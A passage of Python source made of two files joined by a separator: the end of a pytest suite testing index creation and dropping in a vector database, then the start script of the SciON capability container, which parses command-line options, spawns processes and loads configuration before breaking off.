make sure the collection name not in index
expected: create index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: check if index can be created repeatedly, with the same create_index params
        method: create index after the index has been built
expected: return code success, and search ok
"""
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after an index has been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "FLAT", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after an index has been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
create_target_index(indexs[-1], field_name)
assert index == indexs[-1]
# assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
metric_type=metric_type, search_params=search_param)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index
expected: return code not equals to 0, create index failed
"""
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
"""
        target: test create index interface when there are no vectors in the collection, and it does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add entities in it
expected: return code equals to 0
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the same create_index params
        method: create index after the index has been built
expected: return code success, and search ok
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after an index has been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_existed(self, connect):
"""
target: test drop index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_create(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self, connect, collection):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
params, _ = gen_search_vectors_params(binary_field_name, default_binary_entities, default_top_k, nq,
search_params=search_param, metric_type="JACCARD")
logging.getLogger().info(params)
res = connect.search(binary_collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
    ******************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
        expected: return code 0, and index structure
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
        expected: return code 0, and index structure
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection, create partition and add entities in it,
create index on collection, call drop collection index
expected: return code 0, and default index param
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
logging.getLogger().info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
logging.getLogger().info("In callback check search result")
logging.getLogger().info(res)
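    # The async cases below rely on create_index(..., _async=True) returning a
    # future-like object: future.result() blocks until the index request
    # completes, and _callback (when given) is invoked with the result, as in
    # check_result above.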
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, default_index, _async=True)
connect.drop_collection(collection)
with pytest.raises(Exception, match=f'DescribeIndex failed: collection {collection} not found'):
connect.describe_index(collection, "")
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
|
pycc.py
|
#!/usr/bin/env python
"""Python Capability Container start script"""
__author__ = 'Adam R. Smith, Michael Meisinger'
# NOTE: Imports here must be controlled before gevent monkey patching
import argparse
import ast
from copy import deepcopy
from multiprocessing import Process, Event, current_process
import os
import signal
import sys
import traceback
from uuid import uuid4
# WARNING - DO NOT IMPORT GEVENT OR PYON HERE. IMPORTS **MUST** BE DONE IN THE main()
# DUE TO DAEMONIZATION.
#
# SEE: http://groups.google.com/group/gevent/browse_thread/thread/6223805ffcd5be22?pli=1
from putil.script_util import parse_args
log = None
version = "3.2" # TODO: extract version info from the code (tag/commit)
description = '''
SciON Capability Container v%s
''' % version
child_procs = [] # List of child processes to notify on terminate
childproc_go = None # Event that starts child processes (so that main process can complete initialization first)
# See below __main__ for STEP 1
# PYCC STEP 2
def entry():
"""
Parses arguments and daemonizes process if requested
"""
# NOTE: Resist the temptation to add other parameters here! Most container config options
# should be in the config file (pyon.yml), which can also be specified on the command-line via the extra args
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-c', '--config', type=str, help='Additional config files to load or dict config content', default=[])
parser.add_argument('-D', '--config_from_directory', action='store_true')
parser.add_argument('-d', '--daemon', action='store_true')
parser.add_argument('-fc', '--force_clean', action='store_true', help='Force clean system datastores before starting the container')
parser.add_argument('-bc', '--broker_clean', action='store_true', help='Force clean broker of queues/exchanges belonging to sysname')
parser.add_argument('-i', '--immediate', action='store_true', help='Exits the container if the only procs started were of immediate type')
parser.add_argument('-l', '--logcfg', type=str, help='Logging config file or config dict content')
parser.add_argument('-mp', '--multiproc', type=str, help='Start n containers total in separate processes')
parser.add_argument('-mx', '--mx', action='store_true', help='Start admin Web UI')
parser.add_argument('-n', '--noshell', action='store_true', help="Do not start a shell")
parser.add_argument('-o', '--nomanhole', action='store_true', help="Do not start remote-able manhole shell")
parser.add_argument('-p', '--pidfile', type=str, help='PID file to use when --daemon specified. Defaults to cc-<rand>.pid')
parser.add_argument('-r', '--rel', type=str, help='Deploy file to launch')
parser.add_argument('-ra', '--relall', action='store_true', help='Launch deploy file on all child processes')
parser.add_argument('-s', '--sysname', type=str, help='System name')
parser.add_argument('-sp', '--signalparent', action='store_true', help='Signal parent process after procs started')
parser.add_argument('-v', '--version', action='version', version='ScionCC v%s' % version)
parser.add_argument('-x', '--proc', type=str, help='Qualified name of process to start and then exit')
parser.add_argument('-X', '--no_container', action='store_true', help='Perform pre-initialization steps and stop before starting a container')
opts, extra = parser.parse_known_args()
args, kwargs = parse_args(extra)
print "pycc: SciON Container starter with command line options:", str(opts)
# -o or --nomanhole implies --noshell
if opts.nomanhole:
opts.noshell = True
if opts.multiproc:
num_proc = int(opts.multiproc)
if num_proc > 1:
print "pycc: Starting %s child container processes" % (num_proc-1)
global child_procs, childproc_go
childproc_go = Event()
for i in range(1, num_proc):
pinfo = dict(procnum=i)
pname = "Container-child-%s" % pinfo['procnum']
p = Process(name=pname, target=start_childproc, args=(pinfo, opts, args, kwargs))
p.start()
child_procs.append(p)
if opts.daemon:
from daemon import DaemonContext
from lockfile import FileLock
print "pycc: Daemonize process"
# TODO: May need to generate a pidfile based on some parameter or cc name
pidfile = opts.pidfile or 'cc-%s.pid' % str(uuid4())[0:4]
        with DaemonContext(pidfile=FileLock(pidfile)):  # , stdout=logg, stderr=slogg
main(opts, *args, **kwargs)
else:
main(opts, *args, **kwargs)
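# Overview: entry() parses the command line, optionally spawns extra container
# processes (-mp) and/or daemonizes (-d), and then calls main(), which processes
# the arguments and starts the capability container (see its docstring below).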
def start_childproc(pinfo, opts, pycc_args, pycc_kwargs):
""" Main entry point for spawned child processes.
NOTE: Signals are relayed to all child processes (SIGINT, SIGTERM etc)
"""
# TODO: log file config, termination handler, set instance config
global child_procs
child_procs = [] # We are a child
if childproc_go:
childproc_go.wait() # Wait until we get the signal that parent is ready
#print "pycc: Starting child process", current_process().name, pinfo
opts.noshell = True
opts.mx = opts.force_clean = opts.broker_clean = False
if not opts.relall:
opts.rel = None
main(opts, *pycc_args, **pycc_kwargs)
def stop_childprocs():
if child_procs:
log.info("Stopping %s child processes", len(child_procs))
for ch in child_procs:
if ch.is_alive():
os.kill(ch.pid, signal.SIGTERM)
# PYCC STEP 3
def main(opts, *args, **kwargs):
"""
Processes arguments and starts the capability container.
"""
def prepare_logging():
# Load logging override config if provided. Supports variants literal and path.
from pyon.core import log as logutil
logging_config_override = None
if opts.logcfg:
if '{' in opts.logcfg:
# Variant 1: Value is dict of config values
try:
eval_value = ast.literal_eval(opts.logcfg)
logging_config_override = eval_value
except ValueError:
raise Exception("Value error in logcfg arg '%s'" % opts.logcfg)
else:
# Variant 2: Value is path to YAML file containing config values
logutil.DEFAULT_LOGGING_PATHS.append(opts.logcfg)
logutil.configure_logging(logutil.DEFAULT_LOGGING_PATHS, logging_config_override=logging_config_override)
def prepare_container():
"""
Walks through pyon initialization in a deterministic way and initializes Container.
In particular make sure configuration is loaded in correct order and
pycc startup arguments are considered.
"""
# SIDE EFFECT: The import triggers static initializers: Gevent monkey patching, setting pyon defaults
import pyon
import threading
threading.current_thread().name = "CC-Main"
import logging
global log
log = logging.getLogger('pycc')
from pyon.core import bootstrap, config
from pyon.util.containers import get_safe, dict_merge
# Set global testing flag to False. We are running as capability container, because
# we started through the pycc program.
bootstrap.testing = False
# Set sysname if provided in startup argument
if opts.sysname:
bootstrap.set_sys_name(opts.sysname)
# Trigger any initializing default logic in get_sys_name
bootstrap.get_sys_name()
command_line_config = kwargs
# This holds the minimal configuration used to bootstrap pycc and pyon and connect to datastores.
bootstrap_config = None
# This holds the new CFG object for pyon. Build it up in proper sequence and conditions.
pyon_config = config.read_standard_configuration() # Initial pyon.yml + pyon.local.yml
# Load config override if provided. Supports variants literal and list of paths
config_override = None
if opts.config:
if '{' in opts.config:
# Variant 1: Dict of config values
try:
eval_value = ast.literal_eval(opts.config)
config_override = eval_value
except ValueError:
raise Exception("Value error in config arg '%s'" % opts.config)
else:
# Variant 2: List of paths
from pyon.util.config import Config
config_override = Config([opts.config]).data
# Determine bootstrap_config
if opts.config_from_directory:
# Load minimal bootstrap config if option "config_from_directory"
bootstrap_config = config.read_local_configuration(['res/config/pyon_min_boot.yml'])
config.apply_local_configuration(bootstrap_config, pyon.DEFAULT_LOCAL_CONFIG_PATHS)
config.apply_configuration(bootstrap_config, config_override)
config.apply_configuration(bootstrap_config, command_line_config)
log.info("config_from_directory=True. Minimal bootstrap configuration: %s", bootstrap_config)
else:
# Otherwise: Set to standard set of local config files plus command line overrides
bootstrap_config = deepcopy(pyon_config)
config.apply_configuration(bootstrap_config, config_override)
config.apply_configuration(bootstrap_config, command_line_config)
# Override sysname from config file or command line
if not opts.sysname and bootstrap_config.get_safe("system.name", None):
new_sysname = bootstrap_config.get_safe("system.name")
bootstrap.set_sys_name(new_sysname)
# Force_clean - deletes sysname datastores
if opts.force_clean:
from pyon.datastore import clear_db_util
log.info("force_clean=True. DROP DATASTORES for sysname=%s", bootstrap.get_sys_name())
clear_db_util.clear_db(bootstrap_config, prefix=bootstrap.get_sys_name(), sysname=bootstrap.get_sys_name())
from pyon.core.interfaces.interfaces import InterfaceAdmin
iadm = InterfaceAdmin(bootstrap.get_sys_name(), config=bootstrap_config)
# If auto_store_interfaces: ensure that all datastores exist and directory is prepared, with config
# WARNING: If multiple containers start concurrently, this may fail
if get_safe(bootstrap_config, "bootstrap.auto_store_interfaces") is True:
log.debug("auto_store_interfaces=True.")
stored_config = deepcopy(pyon_config)
config.apply_configuration(stored_config, config_override)
config.apply_configuration(stored_config, command_line_config)
iadm.create_core_datastores()
iadm.store_config(stored_config)
# Determine the final pyon_config:
# - Start from standard config already set (pyon.yml + local YML files)
# - Optionally load config from directory
if opts.config_from_directory:
config.apply_remote_config(bootstrap_cfg=bootstrap_config, system_cfg=pyon_config)
# - Apply container profile specific config
config.apply_profile_configuration(pyon_config, bootstrap_config)
# - Reapply pyon.local.yml here again for good measure
config.apply_local_configuration(pyon_config, pyon.DEFAULT_LOCAL_CONFIG_PATHS)
# - Last apply any separate command line config overrides
config.apply_configuration(pyon_config, config_override)
config.apply_configuration(pyon_config, command_line_config)
iadm.set_config(pyon_config)
# Set the immediate flag when command line override specified
if opts.immediate:
dict_merge(pyon_config, {"system": {"immediate": True}}, inplace=True)
# Determine system bootmode for bootstrapping actions (unless explicitly specified)
if not pyon_config.get_safe("bootmode"):
set_bootmode = get_safe(pyon_config, "bootstrap.set_bootmode")
if set_bootmode == "auto":
if iadm.system_data_exists():
dict_merge(pyon_config, {"bootmode": "restart"}, inplace=True)
log.info("System bootmode auto-detection is ON. Determined bootmode=%s", pyon_config.get_safe("bootmode", "initial"))
elif set_bootmode == "secondary":
dict_merge(pyon_config, {"bootmode": "secondary"}, inplace=True)
log.info("System bootmode override. Set to bootmode=%s", pyon_config.get_safe("bootmode", ""))
log.info("System in bootmode=%s", pyon_config.get_safe("bootmode", "initial"))
# Bootstrap the pyon framework's core. Load configuration etc.
bootstrap.bootstrap_pyon(pyon_cfg=pyon_config)
# Delete any queues/exchanges owned by sysname if option "broker_clean" is set
if opts.broker_clean:
log.info("broker_clean=True, sysname: %s", bootstrap.get_sys_name())
from putil.rabbitmq.rabbit_util import RabbitManagementUtil
